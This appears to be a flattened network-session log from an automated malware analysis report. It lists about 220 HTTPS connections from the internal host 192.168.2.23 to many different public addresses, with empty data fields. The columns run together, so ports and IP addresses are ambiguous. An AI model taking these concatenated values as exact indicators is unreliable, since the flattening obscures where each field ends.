                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19012192.168.2.234578273.7.99.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19013192.168.2.235609857.229.10.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19014192.168.2.2348122204.105.214.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19015192.168.2.2340252104.171.139.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19016192.168.2.2333608217.99.167.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19017192.168.2.2355152207.187.107.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19018192.168.2.2346148107.83.252.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19019192.168.2.2354434166.189.106.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19020192.168.2.2348692138.133.164.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19021192.168.2.2348720169.30.202.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19022192.168.2.235992289.153.238.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19023192.168.2.233922697.113.98.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19024192.168.2.2341542130.157.198.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19025192.168.2.2352044137.208.76.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19026192.168.2.2353302167.107.171.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19027192.168.2.2333082207.225.96.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19028192.168.2.2347302128.48.50.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19029192.168.2.235954276.167.115.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19030192.168.2.2334328108.23.215.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19031192.168.2.2351428148.8.183.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19032192.168.2.2357718133.34.125.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19033192.168.2.2355566201.185.130.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19034192.168.2.2353778116.53.60.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19035192.168.2.235095245.13.36.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19036192.168.2.234223225.217.25.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19037192.168.2.234646220.133.187.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19038192.168.2.2336202137.26.114.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19039192.168.2.233528053.46.143.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19040192.168.2.2336692144.119.243.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19041192.168.2.236011682.36.185.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19042192.168.2.23423648.15.20.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19043192.168.2.2347588129.155.31.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19044192.168.2.2345208171.223.144.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19045192.168.2.2355680221.195.96.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19046192.168.2.234826242.159.248.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19047192.168.2.235852661.220.131.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19048192.168.2.2344686118.3.55.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19049192.168.2.2343210121.119.17.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19050192.168.2.2356658172.58.2.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19051192.168.2.233842658.191.24.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19052192.168.2.2346474174.206.132.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19053192.168.2.234189635.95.226.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19054192.168.2.2359016173.176.207.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19055192.168.2.2348866182.216.6.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19056192.168.2.233427825.157.115.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19057192.168.2.2345758158.138.110.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19058192.168.2.235015442.30.235.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19059192.168.2.2346736210.67.197.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19060192.168.2.234691881.226.188.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19061192.168.2.23579922.3.233.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19062192.168.2.2344338192.32.83.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19063192.168.2.2343054122.55.129.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19064192.168.2.2346306157.221.238.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19065192.168.2.2333612201.192.22.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19066192.168.2.2352504128.231.201.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19067192.168.2.2350612193.74.78.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19068192.168.2.2358434158.92.157.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19069192.168.2.2347430122.78.227.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19070192.168.2.234680260.60.104.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19071192.168.2.2348452164.115.182.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19072192.168.2.234705899.174.251.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19073192.168.2.2356164110.158.101.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19074192.168.2.2347920210.121.114.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19075192.168.2.235292652.31.192.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19076192.168.2.235021052.151.240.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19077192.168.2.234518293.41.234.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19078192.168.2.235701436.246.42.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19079192.168.2.2352872177.131.184.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19080192.168.2.2348378139.202.131.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19081192.168.2.2341088146.76.97.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19082192.168.2.2335948183.191.175.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19083192.168.2.235075299.3.38.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19084192.168.2.236030087.248.0.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19085192.168.2.234131659.162.124.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19086192.168.2.2335900197.74.177.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19087192.168.2.233949048.172.225.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19088192.168.2.235944878.249.225.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19089192.168.2.235853057.59.168.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19090192.168.2.234841627.107.78.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19091192.168.2.2359154141.114.5.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19092192.168.2.2346626184.107.180.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19093192.168.2.2337540123.246.88.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19094192.168.2.234447878.216.205.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19095192.168.2.2341088143.164.203.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19096192.168.2.2342690105.63.139.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19097192.168.2.2355426173.224.82.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19098192.168.2.2344644122.134.213.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19099192.168.2.2333402106.147.6.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19100192.168.2.2341910129.212.214.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19101192.168.2.2333160119.242.116.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19102192.168.2.2334154167.212.66.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19103192.168.2.234382640.19.237.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19104192.168.2.2354226190.40.97.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19105192.168.2.2359604140.214.135.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19106192.168.2.235827289.138.48.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19107192.168.2.233358458.205.245.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19108192.168.2.234019479.137.126.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19109192.168.2.2333824112.2.5.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19110192.168.2.234021048.239.71.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19111192.168.2.2341110182.79.147.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19112192.168.2.2349222147.200.64.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19113192.168.2.2341572104.158.134.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19114192.168.2.2355856133.116.125.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19115192.168.2.235567218.95.255.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19116192.168.2.2335588217.27.32.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19117192.168.2.2348348200.119.111.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19118192.168.2.2334464220.217.51.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19119192.168.2.2354022173.114.106.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19120192.168.2.2344328188.1.171.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19121192.168.2.234052682.153.65.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19122192.168.2.2359350101.9.157.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19123192.168.2.2353568159.57.103.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19124192.168.2.234968025.253.175.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19125192.168.2.2350204207.83.190.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19126192.168.2.2340956146.76.250.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19127192.168.2.2360332139.16.210.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19128192.168.2.2351066115.174.25.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19129192.168.2.2355778190.213.12.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19130192.168.2.233371277.157.94.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19131192.168.2.2344978173.183.238.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19132192.168.2.2345780188.151.158.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19133192.168.2.2343072175.228.115.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19134192.168.2.2337588188.222.245.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19135192.168.2.2351440119.249.164.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19136192.168.2.236055482.201.59.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19137192.168.2.2336452173.33.127.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19138192.168.2.2344430175.168.37.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19139192.168.2.235327653.231.148.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19140192.168.2.234108850.20.47.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19141192.168.2.2350224168.165.170.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19142192.168.2.235764263.81.148.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19143192.168.2.234722841.14.177.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19144192.168.2.234370881.24.119.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19145192.168.2.2350888202.57.105.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19146192.168.2.2345352102.84.63.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19147192.168.2.2344316102.189.53.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19148192.168.2.2345168141.22.224.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19149192.168.2.2347270145.81.141.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19150192.168.2.2350452108.117.218.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19151192.168.2.2346876203.181.253.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19152192.168.2.233316836.17.100.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19153192.168.2.234182289.234.65.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19154192.168.2.2334856161.53.163.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19155192.168.2.2346474220.189.25.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19156192.168.2.234815044.56.243.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19157192.168.2.2350640149.34.171.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19158192.168.2.2358244196.70.214.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19159192.168.2.2335884170.185.171.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19160192.168.2.2359606145.95.74.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19161192.168.2.2348468136.243.23.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19162192.168.2.2336962185.160.172.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19163192.168.2.2358644192.97.79.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19164192.168.2.234985257.47.195.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19165192.168.2.2360226157.30.147.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19166192.168.2.23533801.84.72.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19167192.168.2.235976645.46.9.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19168192.168.2.235061273.97.160.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19169192.168.2.2349290105.233.124.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19170192.168.2.2354428186.83.100.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19171192.168.2.2354326105.60.146.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19172192.168.2.2360002196.252.129.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19173192.168.2.233661020.119.174.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19174192.168.2.2333092188.209.225.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19175192.168.2.235768639.135.127.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19176192.168.2.2335904222.120.141.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19177192.168.2.2340234141.115.61.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19178192.168.2.2343612160.151.70.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19179192.168.2.234755671.57.85.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19180192.168.2.233477465.190.42.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19181192.168.2.235050673.43.74.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19182192.168.2.2334048183.55.41.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19183192.168.2.23581605.82.227.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19184192.168.2.2341648174.235.99.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19185192.168.2.2354986193.220.152.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19186192.168.2.2353200182.233.13.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19187192.168.2.2336418183.75.137.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19188192.168.2.2334932213.50.102.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19189192.168.2.2347204118.150.61.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19190192.168.2.2341524131.192.4.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19191192.168.2.234080044.82.7.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19192192.168.2.2336578131.100.61.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19193192.168.2.2357356185.218.218.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19194192.168.2.2352160173.73.135.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19195192.168.2.236002864.210.191.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19196192.168.2.234255657.222.184.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19197192.168.2.233368675.176.148.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19198192.168.2.2351758142.101.127.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19199192.168.2.2359790177.26.97.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19200192.168.2.234546892.91.19.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19201192.168.2.2347972115.69.11.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19202192.168.2.2338952218.87.61.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19203192.168.2.2340824150.230.52.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19204192.168.2.233683034.226.101.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19205192.168.2.2350606103.80.225.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19206192.168.2.2346810158.221.182.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19207192.168.2.2337906110.255.119.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19208192.168.2.2334940154.137.211.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19209192.168.2.234964271.248.147.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19210192.168.2.235882293.164.170.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19211192.168.2.2346126161.122.8.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19212192.168.2.2343876218.72.127.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19213192.168.2.2346744212.190.73.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19214192.168.2.234860823.196.107.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19215192.168.2.235783438.157.0.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19216192.168.2.2359092152.130.185.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19217192.168.2.2354804195.40.61.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19218192.168.2.2340150186.53.113.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19219192.168.2.2333266180.164.119.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19220192.168.2.233388042.194.104.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19221192.168.2.2355972144.195.116.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19222192.168.2.2344108151.16.235.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19223192.168.2.2338424198.147.210.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19224192.168.2.235301012.40.163.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19225192.168.2.2352200223.168.106.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19226192.168.2.235506285.114.68.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19227192.168.2.2341062162.7.153.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19228192.168.2.2358922211.145.62.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19229192.168.2.23538489.24.194.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19230192.168.2.2343004119.253.3.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19231192.168.2.2355036183.188.93.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19232192.168.2.235758254.137.143.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19233192.168.2.233811048.208.12.43443
